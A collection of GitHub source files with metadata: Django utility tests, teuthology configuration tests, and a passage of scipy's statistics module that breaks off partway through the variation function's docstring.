sample = string_to_datetime('2011-1-1 19:25:01')
res = datetime_to_utc_string(sample)
self.assertEqual(res, '2011-01-01 19:25:01+08:00')
class TestModeSerializer(TestCase):
def setUp(self):
classify = Classification.objects.create(c_name='test')
art = Article.objects.create(caption='article',
sub_caption='sub_article',
classification=classify,
content='article test')
art1 = Article.objects.create(caption='article1',
sub_caption='sub_article',
classification=classify,
content='article test')
def test_serializer(self):
art = Article.objects.get(caption='article')
serial = model_serializer(art)
self.assertIsInstance(serial, dict)
serial = model_serializer(art, serializer='json')
self.assertIsInstance(serial, str)
serial = model_serializer(art, serializer='xml')
self.assertIn('xml version="1.0', serial)
def test_serializer_list(self):
art_list = Article.objects.all()
serial = model_serializer(art_list)
self.assertIsInstance(serial, list)
serial = model_serializer(art_list, serializer='json')
self.assertIsInstance(serial, str)
def test_include(self):
art = Article.objects.get(caption='article')
serial = model_serializer(art, include_attr=['caption', 'content'])
self.assertIn('caption', serial)
self.assertNotIn('create_time', serial)
def test_except(self):
art = Article.objects.get(caption='article')
serial = model_serializer(art, except_attr=['caption', 'content'])
self.assertNotIn('caption', serial)
self.assertIn('create_time', serial)
def test_include_except(self):
art = Article.objects.get(caption='article')
serial = model_serializer(art, include_attr=['caption', 'content'], except_attr=['content'])
self.assertIn('caption', serial)
self.assertNotIn('content', serial)
class TestCreateVerifyPic(TestCase):
def test_create(self):
img, code = create_verify_code()
self.assertIsInstance(img, str)
self.assertIsInstance(code, str)
|
{
"content_hash": "cca036fde1a653baec31b280e0478f0d",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 110,
"avg_line_length": 36.26984126984127,
"alnum_prop": 0.613129102844639,
"repo_name": "madarou/angular-django",
"id": "b7bc6922332a89a585b6ffbc09e0aa106a795778",
"size": "4570",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_utils.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "356826"
},
{
"name": "HTML",
"bytes": "77340"
},
{
"name": "Python",
"bytes": "1816255"
}
],
"symlink_target": ""
}
|
import pytest
from .. import config
class TestYamlConfig(object):
def setup(self):
self.test_class = config.YamlConfig
def test_set_multiple(self):
conf_obj = self.test_class()
conf_obj.foo = 'foo'
conf_obj.bar = 'bar'
assert conf_obj.foo == 'foo'
assert conf_obj.bar == 'bar'
assert conf_obj.to_dict()['foo'] == 'foo'
def test_from_dict(self):
in_dict = dict(foo='bar')
conf_obj = self.test_class.from_dict(in_dict)
assert conf_obj.foo == 'bar'
def test_contains(self):
in_dict = dict(foo='bar')
conf_obj = self.test_class.from_dict(in_dict)
conf_obj.bar = "foo"
assert "bar" in conf_obj
assert "foo" in conf_obj
assert "baz" not in conf_obj
def test_to_dict(self):
in_dict = dict(foo='bar')
conf_obj = self.test_class.from_dict(in_dict)
assert conf_obj.to_dict() == in_dict
def test_from_str(self):
in_str = "foo: bar"
conf_obj = self.test_class.from_str(in_str)
assert conf_obj.foo == 'bar'
def test_to_str(self):
in_str = "foo: bar"
conf_obj = self.test_class.from_str(in_str)
assert conf_obj.to_str() == in_str
def test_update(self):
conf_obj = self.test_class(dict())
conf_obj.foo = 'foo'
conf_obj.bar = 'bar'
conf_obj.update(dict(bar='baz'))
assert conf_obj.foo == 'foo'
assert conf_obj.bar == 'baz'
def test_delattr(self):
conf_obj = self.test_class()
conf_obj.foo = 'bar'
assert conf_obj.foo == 'bar'
del conf_obj.foo
assert conf_obj.foo is None
def test_assignment(self):
conf_obj = self.test_class()
conf_obj["foo"] = "bar"
assert conf_obj["foo"] == "bar"
assert conf_obj.foo == "bar"
def test_used_with_update(self):
d = dict()
conf_obj = self.test_class.from_dict({"foo": "bar"})
d.update(conf_obj)
assert d["foo"] == "bar"
class TestTeuthologyConfig(TestYamlConfig):
def setup(self):
self.test_class = config.TeuthologyConfig
def test_get_ceph_git_base_default(self):
conf_obj = self.test_class()
conf_obj.yaml_path = ''
conf_obj.load()
assert conf_obj.ceph_git_base_url == "https://github.com/ceph/"
def test_set_ceph_git_base_via_private(self):
conf_obj = self.test_class()
conf_obj._conf['ceph_git_base_url'] = \
"git://ceph.com/"
assert conf_obj.ceph_git_base_url == "git://ceph.com/"
def test_set_nonstandard(self):
conf_obj = self.test_class()
conf_obj.something = 'something else'
assert conf_obj.something == 'something else'
class TestJobConfig(TestYamlConfig):
def setup(self):
self.test_class = config.JobConfig
class TestFakeNamespace(TestYamlConfig):
def setup(self):
self.test_class = config.FakeNamespace
def test_docopt_dict(self):
"""
Tests if a dict in the format that docopt returns can
be parsed correctly.
"""
d = {
"--verbose": True,
"--an-option": "some_option",
"<an_arg>": "the_arg",
"something": "some_thing",
}
conf_obj = self.test_class(d)
assert conf_obj.verbose
assert conf_obj.an_option == "some_option"
assert conf_obj.an_arg == "the_arg"
assert conf_obj.something == "some_thing"
def test_config(self):
"""
Tests that a teuthology_config property is automatically added
by misc.read_config.
"""
conf_obj = self.test_class(dict(foo="bar"))
assert conf_obj["foo"] == "bar"
assert conf_obj.foo == "bar"
# teuthology_config needs to be a dict because all
# of the tasks expect it to be
assert isinstance(conf_obj.teuthology_config, dict)
def test_getattr(self):
conf_obj = self.test_class.from_dict({"foo": "bar"})
result = getattr(conf_obj, "not_there", "default")
assert result == "default"
result = getattr(conf_obj, "foo")
assert result == "bar"
def test_none(self):
conf_obj = self.test_class.from_dict(dict(null=None))
assert conf_obj.null is None
def test_delattr(self):
conf_obj = self.test_class()
conf_obj.foo = 'bar'
assert conf_obj.foo == 'bar'
del conf_obj.foo
with pytest.raises(AttributeError):
conf_obj.foo
def test_to_str(self):
in_str = "foo: bar"
conf_obj = self.test_class.from_str(in_str)
assert conf_obj.to_str() == "{'foo': 'bar'}"
|
{
"content_hash": "92488752ae30ee56cdf7dc27f67cf356",
"timestamp": "",
"source": "github",
"line_count": 156,
"max_line_length": 71,
"avg_line_length": 30.346153846153847,
"alnum_prop": 0.5648500211237854,
"repo_name": "yghannam/teuthology",
"id": "1bea8b0d7524fba38028c36e7d295271b6391339",
"size": "4734",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "teuthology/test/test_config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "635323"
},
{
"name": "Shell",
"bytes": "9364"
}
],
"symlink_target": ""
}
|
"""
A collection of basic statistical functions for Python. The function
names appear below.
Some scalar functions defined here are also available in the scipy.special
package where they work on arbitrarily sized arrays.
Disclaimers: The function list is obviously incomplete and, worse, the
functions are not optimized. All functions have been tested (some more
so than others), but they are far from bulletproof. Thus, as with any
free software, no warranty or guarantee is expressed or implied. :-) A
few extra functions that don't appear in the list below can be found by
interested treasure-hunters. These functions don't necessarily have
both list and array versions but were deemed useful.
Central Tendency
----------------
.. autosummary::
:toctree: generated/
gmean
hmean
mode
Moments
-------
.. autosummary::
:toctree: generated/
moment
variation
skew
kurtosis
normaltest
Altered Versions
----------------
.. autosummary::
:toctree: generated/
tmean
tvar
tstd
tsem
describe
Frequency Stats
---------------
.. autosummary::
:toctree: generated/
itemfreq
scoreatpercentile
percentileofscore
cumfreq
relfreq
Variability
-----------
.. autosummary::
:toctree: generated/
obrientransform
sem
zmap
zscore
gstd
iqr
median_absolute_deviation
Trimming Functions
------------------
.. autosummary::
:toctree: generated/
trimboth
trim1
Correlation Functions
---------------------
.. autosummary::
:toctree: generated/
pearsonr
fisher_exact
spearmanr
pointbiserialr
kendalltau
weightedtau
linregress
theilslopes
multiscale_graphcorr
Inferential Stats
-----------------
.. autosummary::
:toctree: generated/
ttest_1samp
ttest_ind
ttest_ind_from_stats
ttest_rel
chisquare
power_divergence
ks_2samp
epps_singleton_2samp
mannwhitneyu
ranksums
wilcoxon
kruskal
friedmanchisquare
brunnermunzel
combine_pvalues
Statistical Distances
---------------------
.. autosummary::
:toctree: generated/
wasserstein_distance
energy_distance
ANOVA Functions
---------------
.. autosummary::
:toctree: generated/
f_oneway
Support Functions
-----------------
.. autosummary::
:toctree: generated/
rankdata
rvs_ratio_uniforms
References
----------
.. [CRCProbStat2000] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
"""
from __future__ import division, print_function, absolute_import
import warnings
import sys
import math
if sys.version_info >= (3, 5):
from math import gcd
else:
from fractions import gcd
from collections import namedtuple
import numpy as np
from numpy import array, asarray, ma
from scipy._lib.six import callable, string_types
from scipy.spatial.distance import cdist
from scipy.ndimage import measurements
from scipy._lib._version import NumpyVersion
from scipy._lib._util import _lazywhere, check_random_state, MapWrapper
import scipy.special as special
from scipy import linalg
from . import distributions
from . import mstats_basic
from ._stats_mstats_common import (_find_repeats, linregress, theilslopes,
siegelslopes)
from ._stats import (_kendall_dis, _toint64, _weightedrankedtau,
_local_correlations)
from ._rvs_sampling import rvs_ratio_uniforms
from ._hypotests import epps_singleton_2samp
__all__ = ['find_repeats', 'gmean', 'hmean', 'mode', 'tmean', 'tvar',
'tmin', 'tmax', 'tstd', 'tsem', 'moment', 'variation',
'skew', 'kurtosis', 'describe', 'skewtest', 'kurtosistest',
'normaltest', 'jarque_bera', 'itemfreq',
'scoreatpercentile', 'percentileofscore',
'cumfreq', 'relfreq', 'obrientransform',
'sem', 'zmap', 'zscore', 'iqr', 'gstd', 'median_absolute_deviation',
'sigmaclip', 'trimboth', 'trim1', 'trim_mean', 'f_oneway',
'PearsonRConstantInputWarning', 'PearsonRNearConstantInputWarning',
'pearsonr', 'fisher_exact', 'spearmanr', 'pointbiserialr',
'kendalltau', 'weightedtau',
'multiscale_graphcorr',
'linregress', 'siegelslopes', 'theilslopes', 'ttest_1samp',
'ttest_ind', 'ttest_ind_from_stats', 'ttest_rel', 'kstest',
'chisquare', 'power_divergence', 'ks_2samp', 'mannwhitneyu',
'tiecorrect', 'ranksums', 'kruskal', 'friedmanchisquare',
'rankdata', 'rvs_ratio_uniforms',
'combine_pvalues', 'wasserstein_distance', 'energy_distance',
'brunnermunzel', 'epps_singleton_2samp']
def _chk_asarray(a, axis):
if axis is None:
a = np.ravel(a)
outaxis = 0
else:
a = np.asarray(a)
outaxis = axis
if a.ndim == 0:
a = np.atleast_1d(a)
return a, outaxis
def _chk2_asarray(a, b, axis):
if axis is None:
a = np.ravel(a)
b = np.ravel(b)
outaxis = 0
else:
a = np.asarray(a)
b = np.asarray(b)
outaxis = axis
if a.ndim == 0:
a = np.atleast_1d(a)
if b.ndim == 0:
b = np.atleast_1d(b)
return a, b, outaxis
def _contains_nan(a, nan_policy='propagate'):
policies = ['propagate', 'raise', 'omit']
if nan_policy not in policies:
raise ValueError("nan_policy must be one of {%s}" %
', '.join("'%s'" % s for s in policies))
try:
# Calling np.sum to avoid creating a huge array into memory
# e.g. np.isnan(a).any()
with np.errstate(invalid='ignore'):
contains_nan = np.isnan(np.sum(a))
except TypeError:
# This can happen when attempting to sum things which are not
# numbers (e.g. as in the function `mode`). Try an alternative method:
try:
contains_nan = np.nan in set(a.ravel())
except TypeError:
# Don't know what to do. Fall back to omitting nan values and
# issue a warning.
contains_nan = False
nan_policy = 'omit'
warnings.warn("The input array could not be properly checked for nan "
"values. nan values will be ignored.", RuntimeWarning)
if contains_nan and nan_policy == 'raise':
raise ValueError("The input contains nan values")
return (contains_nan, nan_policy)
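# Illustrative sketch (not part of the original scipy source): the three
# nan_policy behaviours used throughout this module, demonstrated with a
# hypothetical helper that computes a simple mean.
def _nan_policy_sketch(a, nan_policy='propagate'):
    a = np.asarray(a, dtype=float)
    has_nan = np.isnan(a).any()
    if has_nan and nan_policy == 'raise':
        raise ValueError("The input contains nan values")
    if has_nan and nan_policy == 'omit':
        return np.nanmean(a)           # perform the calculation ignoring nans
    return a.mean()                    # 'propagate': nan in, nan out
# _nan_policy_sketch([1.0, np.nan, 3.0])          -> nan
# _nan_policy_sketch([1.0, np.nan, 3.0], 'omit')  -> 2.0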
def gmean(a, axis=0, dtype=None):
"""
Compute the geometric mean along the specified axis.
Return the geometric average of the array elements.
That is: n-th root of (x1 * x2 * ... * xn)
Parameters
----------
a : array_like
Input array or object that can be converted to an array.
axis : int or None, optional
Axis along which the geometric mean is computed. Default is 0.
If None, compute over the whole array `a`.
dtype : dtype, optional
Type of the returned array and of the accumulator in which the
elements are summed. If dtype is not specified, it defaults to the
dtype of a, unless a has an integer dtype with a precision less than
that of the default platform integer. In that case, the default
platform integer is used.
Returns
-------
gmean : ndarray
See `dtype` parameter above.
See Also
--------
numpy.mean : Arithmetic average
numpy.average : Weighted average
hmean : Harmonic mean
Notes
-----
The geometric average is computed over a single dimension of the input
array, axis=0 by default, or all values in the array if axis=None.
float64 intermediate and return values are used for integer inputs.
Use masked arrays to ignore any non-finite values in the input or that
arise in the calculations such as Not a Number and infinity because masked
arrays automatically mask any non-finite values.
Examples
--------
>>> from scipy.stats import gmean
>>> gmean([1, 4])
2.0
>>> gmean([1, 2, 3, 4, 5, 6, 7])
3.3800151591412964
"""
if not isinstance(a, np.ndarray):
# if not an ndarray object attempt to convert it
log_a = np.log(np.array(a, dtype=dtype))
elif dtype:
# Must change the default dtype allowing array type
if isinstance(a, np.ma.MaskedArray):
log_a = np.log(np.ma.asarray(a, dtype=dtype))
else:
log_a = np.log(np.asarray(a, dtype=dtype))
else:
log_a = np.log(a)
return np.exp(log_a.mean(axis=axis))
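# Illustrative sketch (not part of the original scipy source): the identity
# behind gmean() above.  The geometric mean equals exp(mean(log(a))), which is
# numerically safer than taking the n-th root of a potentially huge product;
# ``_gmean_sketch`` is a hypothetical helper used only for this comparison.
def _gmean_sketch(a):
    a = np.asarray(a, dtype=float)
    direct = np.prod(a) ** (1.0 / a.size)      # n-th root of the product
    via_logs = np.exp(np.mean(np.log(a)))      # what gmean() actually computes
    return direct, via_logs
# _gmean_sketch([1, 4]) -> (2.0, 2.0)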
def hmean(a, axis=0, dtype=None):
"""
Calculate the harmonic mean along the specified axis.
That is: n / (1/x1 + 1/x2 + ... + 1/xn)
Parameters
----------
a : array_like
Input array, masked array or object that can be converted to an array.
axis : int or None, optional
Axis along which the harmonic mean is computed. Default is 0.
If None, compute over the whole array `a`.
dtype : dtype, optional
Type of the returned array and of the accumulator in which the
elements are summed. If `dtype` is not specified, it defaults to the
dtype of `a`, unless `a` has an integer `dtype` with a precision less
than that of the default platform integer. In that case, the default
platform integer is used.
Returns
-------
hmean : ndarray
See `dtype` parameter above.
See Also
--------
numpy.mean : Arithmetic average
numpy.average : Weighted average
gmean : Geometric mean
Notes
-----
The harmonic mean is computed over a single dimension of the input
array, axis=0 by default, or all values in the array if axis=None.
float64 intermediate and return values are used for integer inputs.
Use masked arrays to ignore any non-finite values in the input or that
arise in the calculations such as Not a Number and infinity.
Examples
--------
>>> from scipy.stats import hmean
>>> hmean([1, 4])
1.6000000000000001
>>> hmean([1, 2, 3, 4, 5, 6, 7])
2.6997245179063363
"""
if not isinstance(a, np.ndarray):
a = np.array(a, dtype=dtype)
if np.all(a >= 0):
        # Harmonic mean only defined if all elements are greater than or equal to zero.
if isinstance(a, np.ma.MaskedArray):
size = a.count(axis)
else:
if axis is None:
a = a.ravel()
size = a.shape[0]
else:
size = a.shape[axis]
with np.errstate(divide='ignore'):
return size / np.sum(1.0 / a, axis=axis, dtype=dtype)
else:
raise ValueError("Harmonic mean only defined if all elements greater "
"than or equal to zero")
ModeResult = namedtuple('ModeResult', ('mode', 'count'))
def mode(a, axis=0, nan_policy='propagate'):
"""
Return an array of the modal (most common) value in the passed array.
If there is more than one such value, only the smallest is returned.
The bin-count for the modal bins is also returned.
Parameters
----------
a : array_like
n-dimensional array of which to find mode(s).
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
mode : ndarray
Array of modal values.
count : ndarray
Array of counts for each mode.
Examples
--------
>>> a = np.array([[6, 8, 3, 0],
... [3, 2, 1, 7],
... [8, 1, 8, 4],
... [5, 3, 0, 5],
... [4, 7, 5, 9]])
>>> from scipy import stats
>>> stats.mode(a)
(array([[3, 1, 0, 0]]), array([[1, 1, 1, 1]]))
To get mode of whole array, specify ``axis=None``:
>>> stats.mode(a, axis=None)
(array([3]), array([3]))
"""
a, axis = _chk_asarray(a, axis)
if a.size == 0:
return ModeResult(np.array([]), np.array([]))
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.mode(a, axis)
if a.dtype == object and np.nan in set(a.ravel()):
# Fall back to a slower method since np.unique does not work with NaN
scores = set(np.ravel(a)) # get ALL unique values
testshape = list(a.shape)
testshape[axis] = 1
oldmostfreq = np.zeros(testshape, dtype=a.dtype)
oldcounts = np.zeros(testshape, dtype=int)
for score in scores:
template = (a == score)
counts = np.expand_dims(np.sum(template, axis), axis)
mostfrequent = np.where(counts > oldcounts, score, oldmostfreq)
oldcounts = np.maximum(counts, oldcounts)
oldmostfreq = mostfrequent
return ModeResult(mostfrequent, oldcounts)
def _mode1D(a):
vals, cnts = np.unique(a, return_counts=True)
return vals[cnts.argmax()], cnts.max()
# np.apply_along_axis will convert the _mode1D tuples to a numpy array, casting types in the process
# This recreates the results without that issue
# View of a, rotated so the requested axis is last
in_dims = list(range(a.ndim))
a_view = np.transpose(a, in_dims[:axis] + in_dims[axis+1:] + [axis])
inds = np.ndindex(a_view.shape[:-1])
modes = np.empty(a_view.shape[:-1], dtype=a.dtype)
counts = np.zeros(a_view.shape[:-1], dtype=np.int)
for ind in inds:
modes[ind], counts[ind] = _mode1D(a_view[ind])
newshape = list(a.shape)
newshape[axis] = 1
return ModeResult(modes.reshape(newshape), counts.reshape(newshape))
def _mask_to_limits(a, limits, inclusive):
"""Mask an array for values outside of given limits.
This is primarily a utility function.
Parameters
----------
a : array
limits : (float or None, float or None)
A tuple consisting of the (lower limit, upper limit). Values in the
input array less than the lower limit or greater than the upper limit
will be masked out. None implies no limit.
inclusive : (bool, bool)
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to lower or upper are allowed.
Returns
-------
A MaskedArray.
Raises
------
A ValueError if there are no values within the given limits.
"""
lower_limit, upper_limit = limits
lower_include, upper_include = inclusive
am = ma.MaskedArray(a)
if lower_limit is not None:
if lower_include:
am = ma.masked_less(am, lower_limit)
else:
am = ma.masked_less_equal(am, lower_limit)
if upper_limit is not None:
if upper_include:
am = ma.masked_greater(am, upper_limit)
else:
am = ma.masked_greater_equal(am, upper_limit)
if am.count() == 0:
raise ValueError("No array values within given limits")
return am
def tmean(a, limits=None, inclusive=(True, True), axis=None):
"""
Compute the trimmed mean.
This function finds the arithmetic mean of given values, ignoring values
outside the given `limits`.
Parameters
----------
a : array_like
Array of values.
limits : None or (lower limit, upper limit), optional
Values in the input array less than the lower limit or greater than the
upper limit will be ignored. When limits is None (default), then all
values are used. Either of the limit values in the tuple can also be
None representing a half-open interval.
inclusive : (bool, bool), optional
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to the lower or upper limits
are included. The default value is (True, True).
axis : int or None, optional
Axis along which to compute test. Default is None.
Returns
-------
tmean : float
Trimmed mean.
See Also
--------
trim_mean : Returns mean after trimming a proportion from both tails.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tmean(x)
9.5
>>> stats.tmean(x, (3,17))
10.0
"""
a = asarray(a)
if limits is None:
return np.mean(a, None)
am = _mask_to_limits(a.ravel(), limits, inclusive)
return am.mean(axis=axis)
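# Illustrative sketch (not part of the original scipy source): with inclusive
# limits, tmean() above is equivalent to averaging only the values that fall
# inside the closed interval [lower, upper].
def _tmean_sketch(a, lower, upper):
    a = np.asarray(a, dtype=float)
    kept = a[(a >= lower) & (a <= upper)]
    return kept.mean()
# _tmean_sketch(np.arange(20), 3, 17) -> 10.0, matching stats.tmean(x, (3, 17)).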
def tvar(a, limits=None, inclusive=(True, True), axis=0, ddof=1):
"""
Compute the trimmed variance.
This function computes the sample variance of an array of values,
while ignoring values which are outside of given `limits`.
Parameters
----------
a : array_like
Array of values.
limits : None or (lower limit, upper limit), optional
Values in the input array less than the lower limit or greater than the
upper limit will be ignored. When limits is None, then all values are
used. Either of the limit values in the tuple can also be None
representing a half-open interval. The default value is None.
inclusive : (bool, bool), optional
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to the lower or upper limits
are included. The default value is (True, True).
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
ddof : int, optional
Delta degrees of freedom. Default is 1.
Returns
-------
tvar : float
Trimmed variance.
Notes
-----
`tvar` computes the unbiased sample variance, i.e. it uses a correction
factor ``n / (n - 1)``.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tvar(x)
35.0
>>> stats.tvar(x, (3,17))
20.0
"""
a = asarray(a)
a = a.astype(float)
if limits is None:
return a.var(ddof=ddof, axis=axis)
am = _mask_to_limits(a, limits, inclusive)
amnan = am.filled(fill_value=np.nan)
return np.nanvar(amnan, ddof=ddof, axis=axis)
def tmin(a, lowerlimit=None, axis=0, inclusive=True, nan_policy='propagate'):
"""
Compute the trimmed minimum.
    This function finds the minimum value of an array `a` along the
specified axis, but only considering values greater than a specified
lower limit.
Parameters
----------
a : array_like
Array of values.
lowerlimit : None or float, optional
Values in the input array less than the given limit will be ignored.
When lowerlimit is None, then all values are used. The default value
is None.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
inclusive : {True, False}, optional
This flag determines whether values exactly equal to the lower limit
are included. The default value is True.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
tmin : float, int or ndarray
Trimmed minimum.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tmin(x)
0
>>> stats.tmin(x, 13)
13
>>> stats.tmin(x, 13, inclusive=False)
14
"""
a, axis = _chk_asarray(a, axis)
am = _mask_to_limits(a, (lowerlimit, None), (inclusive, False))
contains_nan, nan_policy = _contains_nan(am, nan_policy)
if contains_nan and nan_policy == 'omit':
am = ma.masked_invalid(am)
res = ma.minimum.reduce(am, axis).data
if res.ndim == 0:
return res[()]
return res
def tmax(a, upperlimit=None, axis=0, inclusive=True, nan_policy='propagate'):
"""
Compute the trimmed maximum.
This function computes the maximum value of an array along a given axis,
while ignoring values larger than a specified upper limit.
Parameters
----------
a : array_like
Array of values.
upperlimit : None or float, optional
Values in the input array greater than the given limit will be ignored.
When upperlimit is None, then all values are used. The default value
is None.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
inclusive : {True, False}, optional
This flag determines whether values exactly equal to the upper limit
are included. The default value is True.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
tmax : float, int or ndarray
Trimmed maximum.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tmax(x)
19
>>> stats.tmax(x, 13)
13
>>> stats.tmax(x, 13, inclusive=False)
12
"""
a, axis = _chk_asarray(a, axis)
am = _mask_to_limits(a, (None, upperlimit), (False, inclusive))
contains_nan, nan_policy = _contains_nan(am, nan_policy)
if contains_nan and nan_policy == 'omit':
am = ma.masked_invalid(am)
res = ma.maximum.reduce(am, axis).data
if res.ndim == 0:
return res[()]
return res
def tstd(a, limits=None, inclusive=(True, True), axis=0, ddof=1):
"""
Compute the trimmed sample standard deviation.
This function finds the sample standard deviation of given values,
ignoring values outside the given `limits`.
Parameters
----------
a : array_like
Array of values.
limits : None or (lower limit, upper limit), optional
Values in the input array less than the lower limit or greater than the
upper limit will be ignored. When limits is None, then all values are
used. Either of the limit values in the tuple can also be None
representing a half-open interval. The default value is None.
inclusive : (bool, bool), optional
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to the lower or upper limits
are included. The default value is (True, True).
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
ddof : int, optional
Delta degrees of freedom. Default is 1.
Returns
-------
tstd : float
Trimmed sample standard deviation.
Notes
-----
`tstd` computes the unbiased sample standard deviation, i.e. it uses a
correction factor ``n / (n - 1)``.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tstd(x)
5.9160797830996161
>>> stats.tstd(x, (3,17))
4.4721359549995796
"""
return np.sqrt(tvar(a, limits, inclusive, axis, ddof))
def tsem(a, limits=None, inclusive=(True, True), axis=0, ddof=1):
"""
Compute the trimmed standard error of the mean.
This function finds the standard error of the mean for given
values, ignoring values outside the given `limits`.
Parameters
----------
a : array_like
Array of values.
limits : None or (lower limit, upper limit), optional
Values in the input array less than the lower limit or greater than the
upper limit will be ignored. When limits is None, then all values are
used. Either of the limit values in the tuple can also be None
representing a half-open interval. The default value is None.
inclusive : (bool, bool), optional
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to the lower or upper limits
are included. The default value is (True, True).
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
ddof : int, optional
Delta degrees of freedom. Default is 1.
Returns
-------
tsem : float
Trimmed standard error of the mean.
Notes
-----
`tsem` uses unbiased sample standard deviation, i.e. it uses a
correction factor ``n / (n - 1)``.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tsem(x)
1.3228756555322954
>>> stats.tsem(x, (3,17))
1.1547005383792515
"""
a = np.asarray(a).ravel()
if limits is None:
return a.std(ddof=ddof) / np.sqrt(a.size)
am = _mask_to_limits(a, limits, inclusive)
sd = np.sqrt(np.ma.var(am, ddof=ddof, axis=axis))
return sd / np.sqrt(am.count())
#####################################
# MOMENTS #
#####################################
def moment(a, moment=1, axis=0, nan_policy='propagate'):
r"""
Calculate the nth moment about the mean for a sample.
A moment is a specific quantitative measure of the shape of a set of
points. It is often used to calculate coefficients of skewness and kurtosis
due to its close relationship with them.
Parameters
----------
a : array_like
Input array.
moment : int or array_like of ints, optional
Order of central moment that is returned. Default is 1.
axis : int or None, optional
Axis along which the central moment is computed. Default is 0.
If None, compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
n-th central moment : ndarray or float
The appropriate moment along the given axis or over all values if axis
is None. The denominator for the moment calculation is the number of
observations, no degrees of freedom correction is done.
See Also
--------
kurtosis, skew, describe
Notes
-----
The k-th central moment of a data sample is:
.. math::
m_k = \frac{1}{n} \sum_{i = 1}^n (x_i - \bar{x})^k
Where n is the number of samples and x-bar is the mean. This function uses
exponentiation by squares [1]_ for efficiency.
References
----------
.. [1] https://eli.thegreenplace.net/2009/03/21/efficient-integer-exponentiation-algorithms
Examples
--------
>>> from scipy.stats import moment
>>> moment([1, 2, 3, 4, 5], moment=1)
0.0
>>> moment([1, 2, 3, 4, 5], moment=2)
2.0
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.moment(a, moment, axis)
if a.size == 0:
# empty array, return nan(s) with shape matching `moment`
if np.isscalar(moment):
return np.nan
else:
return np.full(np.asarray(moment).shape, np.nan, dtype=np.float64)
# for array_like moment input, return a value for each.
if not np.isscalar(moment):
mmnt = [_moment(a, i, axis) for i in moment]
return np.array(mmnt)
else:
return _moment(a, moment, axis)
def _moment(a, moment, axis):
if np.abs(moment - np.round(moment)) > 0:
raise ValueError("All moment parameters must be integers")
if moment == 0:
# When moment equals 0, the result is 1, by definition.
shape = list(a.shape)
del shape[axis]
if shape:
# return an actual array of the appropriate shape
return np.ones(shape, dtype=float)
else:
# the input was 1D, so return a scalar instead of a rank-0 array
return 1.0
elif moment == 1:
# By definition the first moment about the mean is 0.
shape = list(a.shape)
del shape[axis]
if shape:
# return an actual array of the appropriate shape
return np.zeros(shape, dtype=float)
else:
# the input was 1D, so return a scalar instead of a rank-0 array
return np.float64(0.0)
else:
# Exponentiation by squares: form exponent sequence
n_list = [moment]
current_n = moment
while current_n > 2:
if current_n % 2:
current_n = (current_n - 1) / 2
else:
current_n /= 2
n_list.append(current_n)
# Starting point for exponentiation by squares
a_zero_mean = a - np.expand_dims(np.mean(a, axis), axis)
if n_list[-1] == 1:
s = a_zero_mean.copy()
else:
s = a_zero_mean**2
# Perform multiplications
for n in n_list[-2::-1]:
s = s**2
if n % 2:
s *= a_zero_mean
return np.mean(s, axis)
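# Illustrative sketch (not part of the original scipy source): the k-th central
# moment that _moment() above computes via exponentiation by squares, written
# in the direct form m_k = mean((x - mean(x))**k) from the moment() docstring.
def _central_moment_sketch(a, k, axis=0):
    a = np.asarray(a, dtype=float)
    centered = a - np.expand_dims(np.mean(a, axis), axis)
    return np.mean(centered ** k, axis)
# _central_moment_sketch([1, 2, 3, 4, 5], 2) -> 2.0, matching moment(a, moment=2).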
def variation(a, axis=0, nan_policy='propagate'):
"""
Compute the coefficient of variation.
The coefficient of variation is the ratio of the biased standard
deviation to the mean.
Parameters
----------
a : array_like
Input array.
axis : int or None, optional
Axis along which to calculate the coefficient of variation. Default
is 0. If None, compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
